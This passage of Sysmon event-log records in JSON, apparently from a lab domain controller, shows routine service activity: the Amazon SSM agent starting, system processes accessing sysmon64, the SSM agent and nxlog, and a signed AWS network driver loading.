05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.855\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001037BE0200}\r\nProcessId: 2468\r\nImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=C982D5932238041410A29A1992B365B0,SHA256=585DB96A52F0C60A6DBC0BFCE79C533D6012C8973F8FC0FAEB659F9A5303DCCF,IMPHASH=F0070935B15A909B9DC00BE7997E6112\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.855","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001037BE0200}","Image":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=C982D5932238041410A29A1992B365B0,SHA256=585DB96A52F0C60A6DBC0BFCE79C533D6012C8973F8FC0FAEB659F9A5303DCCF,IMPHASH=F0070935B15A909B9DC00BE7997E6112","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.125\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001037BE0200}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.125","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001037BE0200}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.125\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001037BE0200}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.125","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001037BE0200}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.161\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00102EBE0200}\r\nTargetProcessId: 2100\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.161","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00102EBE0200}","TargetProcessId":"2100","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1405,"ProcessID":2740,"ThreadID":3448,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:26.500\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xennet.sys\r\nHashes: MD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 05:46:26.500","ImageLoaded":"C:\\Windows\\System32\\drivers\\xennet.sys","Hashes":"MD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.166\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.166","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
